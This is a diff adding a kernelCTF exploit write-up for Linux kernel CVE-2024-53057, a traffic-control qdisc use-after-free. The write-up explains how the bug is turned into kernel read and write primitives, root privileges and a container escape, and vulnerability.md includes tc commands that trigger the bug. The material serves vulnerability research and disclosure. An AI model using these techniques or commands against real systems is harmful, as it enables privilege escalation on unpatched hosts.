diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md new file mode 100644 index 000000000..d779dc890 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/exploit.md @@ -0,0 +1,303 @@ +# CVE-2024-53057 +## Overview + +The vulnerability allows a use-after-free on a `drr_class` during `drr_dequeue()`. Due to the mitigations, we always replace a freed `drr_class` with another `drr_class`. This is done twice while building a vulnerable qdisc hierarchy. Sending a packet through this hierarchy creates a dangling `rb_node` pointer to the `privdata[]` field of a TBF `Qdisc`. The TBF `Qdisc` is replaced with a netem `Qdisc`, creating a type confusion between `tbf_sched_data` and `netem_sched_data` in `privdata[]`. This lets us read and modify an `rb_node`, granting limited read and write primitives. From there, arbitrary read and write primitives are constructed and used for LPE and container escape by modifying the exploit's `task_struct`. + +## Changes from CVE-2024-45016 Exploit + +This exploit is essentially the same as my [`CVE-2024-45016` exploit](https://github.com/google/security-research/tree/master/pocs/linux/kernelctf/CVE-2024-45016_lts_cos_mitigation). `trigger_vuln()` is updated to use the new vulnerability. This vulnerability can only be triggered on one qdisc per net namespace, so two net namespaces are created for each of the vulnerable hierarchies we need to build and the exploit is updated to switch between these namespaces as needed. + +## Traffic Control Background + +The traffic control subsystem under `net/sched` in the Linux kernel tree is responsible for scheduling, shaping, policing and dropping network traffic. When a packet is sent over a network interface using `sendmsg()` and similar syscalls, it will eventually be enqueued at that interface's root qdisc (queueing discipline) in `dev_queue_xmit()`. 
Afterwards `qdisc_run()` is called to dequeue packets from the qdisc according to the qdisc's scheduling algorithm. There are many different qdiscs available, all of which are represented by the same `Qdisc` object. The `privdata[]` field of this object stores data specific to the qdisc type. + +Many qdiscs have a child qdisc to which they enqueue and from which they dequeue packets, resulting in a hierarchy of qdiscs. Some classful qdiscs like DRR or HFSC enqueue each packet to one of a set of user-managed classes, each of which has a child qdisc. These qdiscs allocate an object for each class created (`drr_class` for DRR and `hfsc_class` for HFSC). When a packet is enqueued to one of these classes, the class is added to a list of active classes which will be accessed during dequeue. + +The `q.qlen` field of a class's child qdisc counts the number of packets enqueued and determines when to remove the class from the active list. This happens in `qdisc_tree_reduce_backlog()` by calling the `qlen_notify` method of the qdisc the class belongs to when the child qdisc's `q.qlen` is changed to zero. A bug which causes an inaccurate `q.qlen` can therefore create a dangling pointer to the class from the active list, leading to a use-after-free on the class during the qdisc's dequeue method. + +Each qdisc has an enqueue and dequeue method defined in its `Qdisc_ops`. If a qdisc has a child qdisc, its enqueue method will usually call the enqueue method of the child and so on until the packet is enqueued at a leaf. Similarly, each dequeue method will try to dequeue from a child qdisc until it finds a packet to dequeue. + +If a qdisc has multiple classes, a filter determines which class the packet is enqueued to. The `basic` filter can be used to send all packets to a chosen class. Some qdiscs like HFSC also have a default class parameter which will be used if there is no filter. 
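The `q.qlen` bookkeeping described above can be pictured with a small toy model. This is only a sketch: `toy_class` and the `toy_*` helpers are hypothetical names invented for illustration and do not correspond to kernel structures or functions. It shows why skipping the notification step leaves a freed class reachable from the active list.

```c
#include <assert.h>
#include <stdbool.h>

/* Toy stand-in for a class of a classful qdisc; not a kernel structure. */
struct toy_class {
    unsigned int child_qlen; /* models the child qdisc's q.qlen */
    bool on_active_list;     /* models membership in the active list */
    bool freed;              /* set once the class object is released */
};

/* Models the qlen_notify step: drop the class from the active list. */
static void toy_qlen_notify(struct toy_class *cl)
{
    cl->on_active_list = false;
}

/*
 * Models the backlog reduction: the child's qlen shrinks by n and, when it
 * reaches zero, the owning qdisc is notified. notify_skipped models a bug
 * that bails out before the notification happens.
 */
static void toy_reduce_backlog(struct toy_class *cl, unsigned int n,
                               bool notify_skipped)
{
    cl->child_qlen -= n;
    if (cl->child_qlen == 0 && !notify_skipped)
        toy_qlen_notify(cl);
}

/* Models class deletion: purge the child's packets, then free the class. */
static void toy_delete_class(struct toy_class *cl, bool notify_skipped)
{
    toy_reduce_backlog(cl, cl->child_qlen, notify_skipped);
    cl->freed = true;
}

/* True when a freed class is still reachable from the active list. */
static bool toy_is_dangling(const struct toy_class *cl)
{
    return cl->freed && cl->on_active_list;
}

static void toy_demo(void)
{
    struct toy_class ok = { 1, true, false };
    struct toy_class buggy = { 1, true, false };

    toy_delete_class(&ok, false);   /* notification runs */
    toy_delete_class(&buggy, true); /* notification skipped */

    assert(!toy_is_dangling(&ok));
    assert(toy_is_dangling(&buggy));
}
```

In the model, the only difference between the two deletions is whether the notification runs; the second class ends up freed but still marked as active, which is the state a later dequeue would trip over.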
+When there is more than one active class, the qdisc's scheduling algorithm will choose which class to dequeue from. The HFSC algorithm will always dequeue packets from an RSC class over an FSC class, providing a deterministic way to control from which class the next packet is dequeued. + +Userspace communicates with the traffic control subsystem through netlink messages. All netlink messages used in the exploit are stored in pre-initialized structs and sent with the custom `tc_*` helper functions. + +## Triggering the Vulnerability + +Calling the `trigger_vuln()` function on a class whose qdisc has handle `0xffff0000` will cause the class to remain on its active list when it is eventually freed (`trigger_vuln()` itself does not free the class): + +``` +void trigger_vuln (int parent) { + tc_add_qd(&delay_netem_qdisc_msg, parent, VULN_NETEM_HANDLE); + loopback_send(); +} +``` + +A netem qdisc configured to delay packets is added as the child of `parent` and has a packet enqueued to it. `parent` will remain on its active list as long as the packet is enqueued. When `parent` is deleted, the bug will cause `qdisc_tree_reduce_backlog()` to skip `qlen_notify()` on it and leave it on the active list when it is freed. + +While the class is on the active list, it can be accessed by its qdisc's `dequeue` method, so triggering the vulnerability under a DRR class gives us a use-after-free on a `drr_class` during `drr_dequeue()`. + +## `Qdisc` Use-After-Free + +### Objective + +We want to turn our `drr_class` use-after-free into a use-after-free on the `privdata[]` field of a `Qdisc`, which can be used for type confusion that bypasses the mitigations since we are replacing a `Qdisc` with another `Qdisc` (when working on the exploit, I wasn't aware of the [bypass](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2024-53164_lts_cos_mitigation/docs/exploit.md#additional-notes-for-the-mitigation-instance) that allows a type confusion directly on the class). 
+ +Our use-after-free target is the `watchdog` field of the `tbf_sched_data` struct in a TBF qdisc's `privdata[]`. `watchdog` contains a timer node that is added to a per-CPU RB tree of timers when scheduled by `qdisc_watchdog_schedule_ns()`, which happens in `tbf_dequeue()` when a packet needs to be delayed. This timer is deactivated when the qdisc is destroyed in `__qdisc_destroy()`. If we can schedule it after the qdisc has been destroyed, a dangling pointer will be left to it from the timer tree. + +We can use the vulnerability to call `tbf_dequeue()` on a destroyed TBF qdisc via a dangling pointer to a parent `drr_class`. However `tbf_dequeue()` will only schedule the watchdog timer if it successfully dequeues a packet from the TBF qdisc's child qdisc. Destroying the TBF qdisc purges all packets and it is not possible to enqueue more (the dangling pointer can only be used to dequeue). Therefore we must trigger the vulnerability on a `drr_class` under the TBF qdisc as well. This `drr_class` is freed and replaced with a `drr_class` that remains reachable after the TBF qdisc is destroyed. A packet is enqueued to it normally and dequeued through the dangling pointer. The vulnerability can only be triggered on one qdisc per network namespace, but we can get around this by splitting the hierarchy across two namespaces connected by the dangling pointers. + +After creating the dangling timer node pointer we replace the TBF qdisc with a netem qdisc. Overlapping `netem_sched_data` with `tbf_sched_data` lets us read from and write to the timer node by reading and modifying the netem qdisc’s parameters. + +This demonstrates a way to defeat the mitigations when they are working as intended: use same-object use-after-frees to induce further vulnerabilities until a vulnerability which bypasses the mitigations is reached. There are many bugs for which this will not be possible, for instance some same-object use-after-frees do not lead to any novel behaviour at all. 
+ +### Creating the vulnerable hierarchy + +The `add_qdisc_timer_node()` function creates a dangling timer pointer to a netem qdisc as described above. It constructs the necessary qdisc hierarchy under the passed handle `parent` with an HFSC qdisc with handle `root` at the top and three branches beneath it. The objects in the hierarchy are divided between the `outer` and `inner` namespaces. The root and the first and third branches are in the outer namespace, while the second branch is in the inner namespace. The variables `b1`, `b2`, and `b3` store the handle of each branch's leaf as it is being built. The completed hierarchy is depicted below: + +![Hierarchy diagram](hierarchy.svg) + +The TBF qdisc which we will create a dangling pointer to is located in the second branch. The TBF qdisc's child DRR qdisc has a dangling pointer to a `drr_class` in the third branch, while the first branch contains a DRR qdisc with a dangling pointer to the TBF qdisc's parent `drr_class`. + +We always enqueue packets in the outer namespace. The packets are then enqueued to the third branch due to our choice of filters and the HFSC qdisc's default class parameter and dequeued from the first branch since it is under an RSC class which the HFSC algorithm always prioritizes over FSC classes. + +The dequeue path goes along the two dangling pointers, passing through the TBF qdisc to reach the leaf of branch three where the packet was enqueued. When the packet is passed back up to the TBF qdisc, the timer is scheduled: + +![Enqueue/dequeue paths diagram](paths.svg) + +#### DRR class spray + +While building the hierarchy, we perform a `drr_class` spray in `kmalloc-128` for each dangling `drr_class` pointer we create. After each spray we need to determine which of the sprayed classes is under the dangling pointer. The `drr_spray_and_find()` function sprays `drr_class` objects and returns the handle of the successfully sprayed class. 
+ +The successful class is found by sending a packet to each of the sprayed classes. A `basic` filter is used to make each sprayed class the default class in turn. The sent packet will be dequeued via the dangling pointer, so we know we found the right class if the packet we send is successfully received back. + +This only works if the packet is enqueued in the outer namespace, which only happens for the `drr_class` under the TBF qdisc. When replacing the other `drr_class` we assume that the first allocation falls under the dangling pointer and retry if this is incorrect (in which case `drr_spray_and_find()` will fail on the class under the TBF qdisc). We still spray more DRR classes after this to prevent anything else being allocated under the dangling pointer if the first allocation misses. + +Dequeuing the packet will decrement the `q.qlen` of every qdisc on the dequeue path. This risks removing their classes from their active lists and preventing further packets being dequeued this way. A second DRR class with handle `pin` is therefore added to the same active list as the first vulnerable class and a packet is sent to it. Then `drr_spray_and_find()` will leave all active lists undisturbed when dequeuing a packet. + +#### Setting the timer + +After the hierarchy is built, we need to send the `stall_tbf_qdisc_msg` netlink message to change the TBF qdisc's `rate` parameter so that the timer will be scheduled during dequeue. This affects the following code which schedules the timer in `tbf_dequeue()`: + +``` +unsigned int len = qdisc_pkt_len(skb); +toks -= (s64) psched_l2t_ns(&q->rate, len); +qdisc_watchdog_schedule_ns(&q->watchdog, now + max_t(long, -toks, -ptoks)); +``` + +When `rate` is `1` the timer will wait for `len - 1` seconds. We want a large waiting time to prevent other timer nodes on the same CPU being added under our node. The `label` argument determines both the packet length and the wait time. It is converted to a length using the `LABEL_TO_VALUE()` macro. 
After the TBF qdisc is destroyed via its parent handle `tbfp`, a packet with this length is sent and schedules the TBF timer as shown in the above diagram. + +Unfortunately, on `6.1` kernels the freelist pointer of a TBF qdisc overlaps with the timer's `rb_node`. If the timer is set after the qdisc is freed, the kernel will crash when trying to reallocate the qdisc's memory. Rather than trying to race from another thread, we simply hope that our `sendto()` completes during the RCU delay before the qdisc is freed. A large number of DRR classes are added under the TBF qdisc to increase the delay since their child qdiscs are freed before the TBF qdisc. This is the primary cause of exploit failure against the `6.1` mitigation kernel, causing a crash in about 10% of attempts against the live instance. The `6.6` kernel is not affected. + +#### Netem qdisc spray + +Once the timer is scheduled, `membarrier(MEMBARRIER_CMD_GLOBAL, 0)` is used to wait for the RCU delay that precedes the freeing of the TBF qdisc, and netem qdiscs are then sprayed in the `kmalloc-1k` cache. The first netem qdisc in the spray is added as the child of `b3` and each subsequent qdisc is added as a child of the previous one. The handles of the sprayed qdiscs are returned via the `spray_handles` array. + +Later in the exploit it will be relevant which bucket in the net device's `qdisc_hash` hash table the netem qdisc is stored in. The hash is calculated from the qdisc's handle. We make sure that all the sprayed netem qdiscs have a handle whose hash matches the passed `spray_hash`. + +### Reading from and writing to `netem_sched_data` + +A netem qdisc's parameters are stored in the `netem_sched_data` struct in its `->privdata[]` and can be read or modified through netlink messages. There are two blocks of contiguous memory inside `netem_sched_data` which consist largely of readable and writable parameters. 
The first is a 56-byte block starting at `->latency`: + +``` +s64 latency; +s64 jitter; +u32 loss; +u32 ecn; +u32 limit; +u32 counter; +u32 gap; +u32 duplicate; +u32 reorder; +u32 corrupt; +u64 rate; +``` + +Outside of bytes 11 to 15 and 28 to 31, this entire block can be read and modified. Bytes 11 to 15 are the top 5 bytes of `jitter`, which is capped at `INT_MAX`. They can be read but not set to any value greater than `0x000000007f`. Bytes 28 to 31 hold `counter`, which cannot be read or modified through `netem_change()`. + +This block contains the fake `rb_node` under our dangling pointer. The `rb_node` is located at `&latency`, so the only valid value we can write to its `->rb_right` child is `NULL`. Any value can be written to the left child and parent, and all three fields can be arbitrarily read. + +The second block consists of the 40-byte `tc_netem_slot` structure `->slot_config` near the end of `netem_sched_data`: + +``` +__s64 min_delay; +__s64 max_delay; +__s32 max_packets; +__s32 max_bytes; +__s64 dist_delay; +__s64 dist_jitter; +``` + +Writing to `dist_jitter` in bytes 32 to 39 has the same limitation as writing to `jitter`; `max_packets` and `max_bytes` in bytes 16 to 23 can be set to any non-zero value; all other fields can be arbitrarily set and read. + +We use `write_netem_parms()` and `read_netem_parms()` to send the netlink messages necessary to write or read the parameters of a given netem qdisc. The passed buffers are copied to or from the corresponding parameter blocks as closely as possible. Note that `read_netem_parms()` does not read from the second block of parameters as it is not needed for the exploit. + +Reading is performed by sending an `RTM_GETQDISC` netlink message, which will be received by `qdisc_get_notify()` in the kernel. This function builds a diagnostic dump by calling `tc_fill_qdisc()` on each of the net device's qdiscs. 
We can then read the dump from the netlink socket and locate a specific qdisc's parameters within it. We can write to a netem qdisc's parameters by sending a `RTM_NEWQDISC` message. As long as there is no mismatch in the qdisc type, the specified `Qdisc` will be modified in place by `netem_change()` rather than being reallocated. + +### RB tree rebalancing write primitive + +Deleting an `rb_node` with two children can cause a rebalancing which grants a write primitive when we control the right child. A diagram of the rebalancing is included in the kernel code in `__rb_erase_augmented()`: + +``` +/* + * Case 3: node's successor is leftmost under + * node's right child subtree + * + * (n) (s) + * / \ / \ + * (x) (y) -> (x) (y) + * / / + * (p) (p) + * / / + * (s) (c) + * \ + * (c) + */ +``` + +The address of `p` will be written to the `__rb_parent_color` field of `c` when `p` becomes `c`'s parent. Assuming we control `y`, `p` and `s`, we can write the address of `p` to an arbitrary location specified in the `rb_right` field of `s`. + +Afterwards `s` is the new root of the subtree. If we can remove the subtree's parent, the process can be repeated with `s` taking the place of `y`. + +The least significant bit of an `rb_node`'s `__rb_parent_color` field stores its color. It is `1` if the node is black and `0` if it is red. The above rebalancing always results in `p` being colored black. Prior to commit `b0687c1119b4` coloring was done using the `|` operation, so the value written to `c` would always end in `1`. This is not an issue if we want to write a pointer for a fake structure we control, since we can place the fake structure at a misaligned address. After this commit `+` is used instead, removing this restriction. `6.1` kernels still use `|` and `6.6` kernels use `+`. To ensure the exploit works across all versions, `p` is always located at an even address and the fake object is placed at an offset of 1 from this address. 
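The difference between the two color encodings described above can be checked with a few lines of arithmetic. The following is a minimal sketch, not kernel code: `parent_color_or()`, `parent_color_add()` and `fake_object_addr()` are hypothetical helper names, and the addresses are made-up values chosen only for their parity. It illustrates why keeping `p` at an even address and placing the fake object at `p + 1` gives the same written value under both `|` and `+`.

```c
#include <assert.h>
#include <stdint.h>

#define RB_RED   0
#define RB_BLACK 1

/* Encoding the text attributes to 6.1 kernels: parent | color. */
static uintptr_t parent_color_or(uintptr_t parent, unsigned int color)
{
    return parent | color;
}

/* Encoding the text attributes to 6.6 kernels: parent + color. */
static uintptr_t parent_color_add(uintptr_t parent, unsigned int color)
{
    return parent + color;
}

/* Where the fake object has to start so that the written value points at it. */
static uintptr_t fake_object_addr(uintptr_t p)
{
    return p + 1;
}

static void color_encoding_demo(void)
{
    uintptr_t even_p = 0x1000; /* hypothetical even address for p */
    uintptr_t odd_p = 0x1001;  /* hypothetical odd address for p */

    /* Even p: both encodings write p + 1, so one layout fits both kernels. */
    assert(parent_color_or(even_p, RB_BLACK) == fake_object_addr(even_p));
    assert(parent_color_add(even_p, RB_BLACK) == fake_object_addr(even_p));

    /* Odd p: the encodings disagree, so the written pointer would differ. */
    assert(parent_color_or(odd_p, RB_BLACK) == odd_p);
    assert(parent_color_add(odd_p, RB_BLACK) == odd_p + 1);
}
```

With an odd `p` the written value would depend on the kernel version, which is why the sketch treats the even-address case as the portable one.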
+ +## Exploit + +### Qdisc setup + +We will need to trigger the `Qdisc` use-after-free twice during the exploit, so we create four network namespaces in total. We open a netlink and inet socket in each namespace before unsharing to create the next one. After the exploit task enters a new namespace, the old namespace can still be accessed through the sockets opened in it. + +Both of the namespaces have an HFSC qdisc as the root and an FSC class under which `add_qdisc_timer_node()` is called. In the first namespace, this HFSC qdisc is used for the arbitrary write primitive. The HFSC qdisc in the second namespace is used to hold a packet which we will later use to leak kernel addresses. The handles of the root qdiscs are chosen such that their hashes are distinct from those of the attacker netem qdiscs. + +### RB tree setup + +Each `add_qdisc_timer_node()` call adds an attacker-controlled `rb_node` to the CPU's timer tree. We use this together with `add_timer_node()`, which sets a timer using `timerfd_settime()`, to construct a tree with two attacker-controlled nodes and fifteen regular timer nodes. Each removal of a regular node from the tree will give us a read or write primitive. + +Since the timer tree is shared with all other threads on the CPU, we make the values in our RB nodes as large as possible to lower the chance of interference. To avoid working with these large values in the exploit and writeup, we refer to the nodes using labels from `0` to `16`. The `LABEL_TO_VALUE()` macro converts these labels to the approximate value of the corresponding timer node while preserving their order. + +The `add_order` array determines which value to add at each step. 
The shape of the tree will vary depending on how many nodes have been added by other threads on the CPU, but the substructure depicted below should be present as long as no timer nodes with values larger than ours are added: + +``` + \ ( ) regular node + (9) < > attacker node +/ \ + (11) + / \ + (13) + / \ + (15) + / \ + <14> <16> +``` + +The nodes with labels `9`, `11`, `13` and `15` will each be removed to trigger an infoleak or write. The parent of `9` should also be under our control, since if it is removed after `9` is removed a crash will occur. To prevent that, we add many timerfd nodes with the label `-1`, shielding the top of the subtree from other threads. + +Once the TBF `Qdisc`s containing the attacker nodes have been replaced with netem `Qdisc`s, their node values are no longer relevant. The netem qdiscs inserted with labels 14 and 16 are referred to as `n1` and `n2`, respectively. + + +### Leaking `Qdisc` heap addresses + +Removing the parent of the two attacker-controlled nodes results in one of them becoming the parent of the other: + +``` + \ \ + (13) (13) +/ \ / \ + (15) --> + / \ / + +``` + +This writes the address of the parent to the child and vice versa. By reading the parameters of all sprayed netem qdiscs and searching for valid kernel addresses, we can determine the handles and addresses on the heap of the two qdiscs which contain timer nodes. + +### Arbitrary read + +A read primitive is obtained by passing a fake `Qdisc` to `tc_fill_qdisc()` when building a qdisc dump. 24 bytes read from the `Qdisc`’s `->stab.szopts` are returned to userspace within the dump. Two rebalancings are necessary to set up the read primitive. + +#### Rebalancing writes + +In addition to the fake `Qdisc`'s `->stab` at offset 32, we must also provide valid addresses for `->ops` at offset 24 and `->dev_queue` at offset 64 to prevent `tc_fill_qdisc()` from crashing. 
Overlapping the fake `Qdisc` with `n2->slot` lets us control `->ops` and `->stab` but not `->dev_queue`, which will align with `&n2->slot_dist`. We use the rebalancing write primitive to overwrite `&n2->slot_dist` with the address of a fake `dev_queue`. + +The addresses of the fake nodes corresponding to nodes `y`,`p`,`s`, and `c` in the rebalancing diagram for this write are: + +``` +y,p: &n2->latency +s: &n1->latency + 32 +c: &n2->slot_dist +``` + +The role of `y` and `p` is taken by a single fake node. Its address plus one will be written to `&n2->slot_dist`. + +Another write is needed to insert the fake `Qdisc` into the net device's qdisc hash table so that `qdisc_get_notify()` calls `tc_fill_qdisc()` on it when building a dump. This is done by overwriting `n2->hash.next` with the address of a fake qdisc. + +Due to the limitation of the rebalancing write mentioned above, the fake qdisc linked to by `n2->hash.next` will be at a misaligned offset, limiting which of its fields we can set. Therefore this qdisc will only be used to link to the fake qdisc that is actually used for the read. Here are the `y`,`p`,`s`,`c` addresses for the rebalancing write: + +``` +y: &n1->latency + 32 +p: &n2->latency + 32 +s: &n1->slot + 8 +c: &n2->hash.next +``` + +When `n2->hash.next` is overwritten, all qdiscs after `n2` in the hash bucket become inaccessible. This is why we made sure that any qdiscs we need to access after this point have a hash distinct from `n2`. + +#### Using arbitrary read + +Before each read, the two fake `Qdisc`s have to be written to `n2`'s `privdata[]`. Their values are initialized in `setup_stab_read()` along with the other information needed to perform the read. + +The fake `Qdisc` linked to by `n2->hash.next` has its base at `&n2->latency - 7`. The following fields are set: + +- `flags` is set to `TCQ_F_INVISIBLE` so that this `Qdisc` is skipped during the dump. +- `hash.next` is set to `n2->slot + 32`, linking the `Qdisc` we want to dump. 
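The base addresses of the fake `Qdisc`s follow from the offset of `hash` inside `Qdisc` and can be worked out by hand. The sketch below redoes that arithmetic using the COS/mitigation offsets defined in `exploit.c`. It assumes that `n2->slot` in the text refers to the parameter block at `SLOT_CONFIG_OFF`; `container_base()` and `fake_qdisc_layout_demo()` are hypothetical names introduced here for illustration.

```c
#include <assert.h>

/* Offsets copied from the COS/mitigation definitions in exploit.c. */
#define QDISC_HLIST_OFF 40  /* offsetof(struct Qdisc, hash) */
#define NETDEV_OFF      64  /* offsetof(struct Qdisc, dev_queue) */
#define SLOT_CONFIG_OFF 280 /* slot parameter block in netem_sched_data */
#define SLOT_DIST_OFF   336 /* slot_dist pointer in netem_sched_data */

/* Base of a structure whose member at member_off sits at member_addr. */
static long container_base(long member_addr, long member_off)
{
    return member_addr - member_off;
}

static void fake_qdisc_layout_demo(void)
{
    /* First fake Qdisc: addresses relative to &n2->latency (taken as 0). */
    long p = 32;          /* p of the hash.next write: &n2->latency + 32 */
    long written = p + 1; /* the rebalancing write stores p with the color bit */
    assert(container_base(written, QDISC_HLIST_OFF) == -7);

    /* Linked Qdisc: addresses relative to the slot block (taken as 0). */
    long next = 32;       /* hash.next of the first fake Qdisc: slot + 32 */
    long linked_base = container_base(next, QDISC_HLIST_OFF);
    assert(linked_base == -8);

    /* Assumption check: dev_queue of the linked Qdisc lands on slot_dist. */
    assert(linked_base + NETDEV_OFF == SLOT_DIST_OFF - SLOT_CONFIG_OFF);
}
```

Under these assumptions the numbers agree with the writeup: the misaligned `Qdisc` starts at `&n2->latency - 7`, and the `Qdisc` it links to has its `dev_queue` field exactly where `slot_dist` is stored.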
+ +The `Qdisc` we want to dump has its base at `&n2->slot - 8`. The following fields have to be set for the read to be successful: + +- `flags` is set to zero. +- `ops` is set to `&n2->latency + 232`, so that `ops->ingress_block_get` and `ops->egress_block_get` are `NULL`, preventing them from being called. +- `stab` is set to the target address. +- `hash.next` is set to `NULL` to stop the dump. +- `dev_queue` has value `&n2->latency + 1` from the earlier rebalancing write. The `dev_queue->dev->ifindex` field will be dumped during `tc_fill_qdisc()`. `dev_queue->dev` is set such that `ifindex` is located at `&n2->latency + 48` and `ifindex` is set to a unique value to identify the fake qdisc in the dump. + +After writing the fake `Qdisc`s to kernel memory, we can use `read_netem_stab()` to dump the net device's qdiscs and find the 24 bytes of leaked data. The `stab_read_8()` function does this and returns 8 bytes read from the passed kernel address. + +### Write-what-where + +The `vttree_get_minvt()` call in `hfsc_dequeue()` provides a write-what-where primitive if we control `hfsc_class`, as described in the [writeup](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md#write-what-where) for CVE-2023-4623. This primitive allows us to write 8 bytes to an arbitrary address, with the restriction that the written value must be larger (as a `u64`) than the value it is replacing. It can be set up with one rebalancing write. + +#### Rebalancing write + +The rebalancing write primitive is used to replace the root FSC `hfsc_class` of the interface's root qdisc: + +``` +y: &n1->slot + 8 +p: &n1->latency - 16 +s: &n1->latency + 32 +c: &root_qdisc->privdata.root.vt_tree +``` + +This inserts a fake `hfsc_class` into the root qdisc's `vt_tree` with its `vt_node` at `&n1->latency - 15`. 
There is not enough space in the netem qdisc parameters to fake all the fields necessary for the write primitive, so this `hfsc_class` will only be used to link the `hfsc_class` actually used for the write. + +#### Using write-what-where + +Before each write, a fake `hfsc_class` is placed in `n1->slot_dist`, which is a `disttable` structure consisting of a 4-byte header followed by a buffer of user-provided data. It can be reallocated during `netem_change()` with the new contents copied from the `TCA_NETEM_SLOT_DIST` field of the netlink parameters. The `cl_parent` and `cl_vt` fields of this class store the target address and value for the write primitive, respectively. + +The stab read primitive is then used to read the newly allocated `n1->slot_dist`. This lets us calculate the address of the fake `hfsc_class` contained in it, which we then insert into the root qdisc's `vt_tree` by changing the `vt_node->rb_right` field of the `hfsc_class` in `n1`'s parameters. Now `vttree_get_minvt()` will find the fake class we placed in `slot_dist`, assign it to `cl` and execute + +``` +if (cl->cl_parent->cl_cvtmin < cl->cl_vt) + cl->cl_parent->cl_cvtmin = cl->cl_vt; +``` + +on it, writing the 8-byte value in `cl_vt` to the address in `cl_parent`. + +The write primitive is implemented by `vt_write_8()`, which writes `val` to `addr` through the process outlined above. `setup_vt_write()` is called once to store the address and handle of `n1` for `vt_write_8()`. + +### LPE + +With the read and write primitives set up, we escalate privileges by modifying the exploit's `task_struct`. The `task_struct`'s address can be found by reading the following chain of pointers, starting at the `sk_buff` structure in the `t_head` field of `netem_sched_data`: + +`t_head->sk->sock->file->f_owner->pid->tasks[0]` + +Two of these pointers, `t_head` and `f_owner`, have to be manually set. `f_owner` is set by using the `F_SETOWN` fcntl on the inet socket. 
`t_head` is set by enqueueing a delayed packet to a netem qdisc with handle `enq_qd` in the second namespace during qdisc setup. The `handle_to_kaddr()` helper function searches the net device's hash list of qdiscs for this qdisc and returns its address (the address of the net device is obtained by reading `n2->dev_queue->dev`). + +The address of `init_task` is then obtained by repeatedly dereferencing `->parent` starting from the exploit `task_struct`. The exploit `task_struct`'s `->cred` and `->fs` are replaced by `init_cred` and `init_fs` to escalate privileges and escape the mount namespace (the write primitive is guaranteed to work here since `init_cred` and `init_fs` are part of the kernel image, which is at a higher address than the heap). \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg new file mode 100644 index 000000000..92d0f065b --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/hierarchy.svg @@ -0,0 +1,3 @@ + + +
[Figure hierarchy.svg: diagram of the qdisc hierarchy. Node labels: HFSC qdisc `root`, HFSC RSC class, HFSC FSC class, DRR qdisc, DRR class `tbfp`, DRR class `b3`, TBF qdisc, `parent`. Legend: dangling pointer, regular pointer, outer namespace, inner namespace.]
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg new file mode 100644 index 000000000..8fc863735 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/paths.svg @@ -0,0 +1,3 @@ + + +
[Figure paths.svg: the same qdisc hierarchy annotated with the enqueue path, the dequeue path, and the point where the timer is set. Node labels: HFSC qdisc `root`, HFSC RSC class, HFSC FSC class, DRR qdisc, DRR class `tbfp`, DRR class `b3`, TBF qdisc, `parent`. Legend: dangling pointer, regular pointer, outer namespace, inner namespace.]
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md new file mode 100644 index 000000000..d3cdced0d --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/docs/vulnerability.md @@ -0,0 +1,19 @@ +A vulnerability in the traffic control subsystem can lead to a use-after-free. It is possible to create a non-ingress qdisc with the handle `TC_H_MAJ(TC_H_INGRESS)` (that is `0xffff0000`), which will make `qdisc_tree_reduce_backlog()` assume that it is an ingress qdisc and skip `qlen_notify()` on its classes. This can leave a dangling active list pointer to a class if it is deleted while a packet is enqueued to it. + +To trigger the vulnerability, we create a DRR qdisc with handle `TC_H_MAJ(TC_H_INGRESS)` and one class. A netem qdisc is added as the child of this class and configured to delay packets. A packet is then sent and the DRR class is deleted while the packet is still enqueued at its child. The bug causes `qdisc_tree_reduce_backlog()` to skip `qlen_notify()`, so the DRR class is not removed from its active list. It then remains on the active list after being freed, leading to a use-after-free in `drr_dequeue()`. + +The use-after-free was introduced with commit `066a3b5b2346 ("sch_api: fix qdisc_tree_decrease_qlen() loop")` and fixed with commit `2e95c4384438 ("net/sched: stop qdisc_tree_reduce_backlog on TC_H_ROOT")`. It affected kernel versions `2.6.25` to `6.11.6`. + +The vulnerability requires `CAP_NET_ADMIN` and can therefore only be exploited for privilege escalation from a user namespace. 
The following commands will trigger it and cause a use-after-free: + +``` +ip link set lo up +tc qdisc add dev lo parent root handle ffff: drr +tc filter add dev lo parent ffff: basic classid ffff:1 +tc class add dev lo parent ffff: classid ffff:1 drr +tc qdisc add dev lo parent ffff:1 netem delay 1s +ping -c1 -W0.01 localhost +tc class del dev lo classid ffff:1 +tc class add dev lo parent ffff: classid ffff:1 drr +ping -c1 -W0.01 localhost +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile new file mode 100644 index 000000000..8564a1e08 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/Makefile @@ -0,0 +1,7 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -Wno-address-of-packed-member -static -D COS + +exploit: exploit.c + gcc $(CFLAGS) -o $@ $< + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit b/pocs/linux/kernelctf/CVE-2024-53057_lts_cos_mitigation/exploit/cos-109-17800.309.59/exploit new file mode 100644 index 000000000..833b38382 Binary files /dev/null and 